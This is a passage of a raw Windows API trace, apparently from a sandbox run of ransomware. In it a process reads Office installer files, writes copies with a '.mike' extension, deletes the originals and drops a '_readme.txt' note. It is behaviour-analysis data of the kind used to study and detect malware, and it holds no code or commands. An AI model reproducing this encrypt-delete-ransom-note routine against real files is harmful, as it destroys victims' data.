lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.866] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.866] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", lpFilePart=0x0) returned 0x51 [0041.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.866] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.866] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", lpFilePart=0x0) returned 0x51 [0041.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.866] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.867] GetFileType (hFile=0x264) returned 0x1 [0041.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.867] GetFileType (hFile=0x264) returned 0x1 [0041.867] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.867] WriteFile (in: hFile=0x264, lpBuffer=0x213d558*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x213d558*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.868] CloseHandle (hObject=0x264) returned 1 [0041.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.868] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x213d038 | out: lpFileInformation=0x213d038*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915)) returned 1 [0041.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.868] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.868] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.868] GetFileType (hFile=0x264) returned 0x1 [0041.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.868] GetFileType (hFile=0x264) returned 0x1 [0041.868] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.869] ReadFile (in: hFile=0x264, lpBuffer=0x213e690, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x213e690*, lpNumberOfBytesRead=0x2af110*=0x1915, lpOverlapped=0x0) returned 1 [0041.870] CloseHandle (hObject=0x264) returned 1 [0041.871] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", lpFilePart=0x0) returned 0x51 [0041.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.871] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.871] GetFileType (hFile=0x264) returned 0x1 [0041.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.871] GetFileType (hFile=0x264) returned 0x1 [0041.871] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.872] WriteFile (in: hFile=0x264, lpBuffer=0x2149184*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2149184*, lpNumberOfBytesWritten=0x2af124*=0x1920, lpOverlapped=0x0) returned 1 [0041.872] CloseHandle (hObject=0x264) returned 1 [0041.873] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", lpFilePart=0x0) returned 0x51 [0041.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.873] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.873] GetFileType (hFile=0x264) returned 0x1 [0041.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.873] GetFileType (hFile=0x264) returned 0x1 [0041.874] WriteFile (in: hFile=0x264, lpBuffer=0x214ce1c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x214ce1c*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.874] CloseHandle (hObject=0x264) returned 1 [0041.875] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.875] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", lpFilePart=0x0) returned 0x51 [0041.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.875] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3282920, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3282920, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32a8a80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1b40)) returned 1 [0041.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.875] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.875] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike", lpFilePart=0x0) returned 0x51 [0041.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.875] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x214e5d0 | out: lpFileInformation=0x214e5d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3282920, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3282920, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32a8a80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1b40)) returned 1 [0041.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.876] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.876] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", dwFileAttributes=0x80) returned 1 [0041.876] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.876] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 1 [0041.877] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.877] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.877] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpFilePart=0x0) returned 0x4c [0041.877] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.877] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.878] GetFileType (hFile=0x264) returned 0x1 [0041.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.878] GetFileType (hFile=0x264) returned 0x1 [0041.878] WriteFile (in: hFile=0x264, lpBuffer=0x21502ec*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21502ec*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.879] CloseHandle (hObject=0x264) returned 1 [0041.879] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", lpFilePart=0x0) returned 0x4b [0041.879] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", lpFilePart=0x0) returned 0x48 [0041.879] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.879] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.879] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.879] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.880] GetFileType (hFile=0x264) returned 0x1 [0041.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.880] GetFileType (hFile=0x264) returned 0x1 [0041.880] CloseHandle (hObject=0x264) returned 1 [0041.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.881] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.881] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.881] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x215660c | out: lpFileInformation=0x215660c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b)) returned 1 [0041.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.881] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2156928 | out: lpFileInformation=0x2156928*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b)) returned 1 [0041.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.881] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.882] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.882] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.882] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.882] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.882] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.882] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.882] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.882] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.882] GetFileType (hFile=0x264) returned 0x1 [0041.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.883] GetFileType (hFile=0x264) returned 0x1 [0041.883] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.883] WriteFile (in: hFile=0x264, lpBuffer=0x21577a4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21577a4*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.884] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all 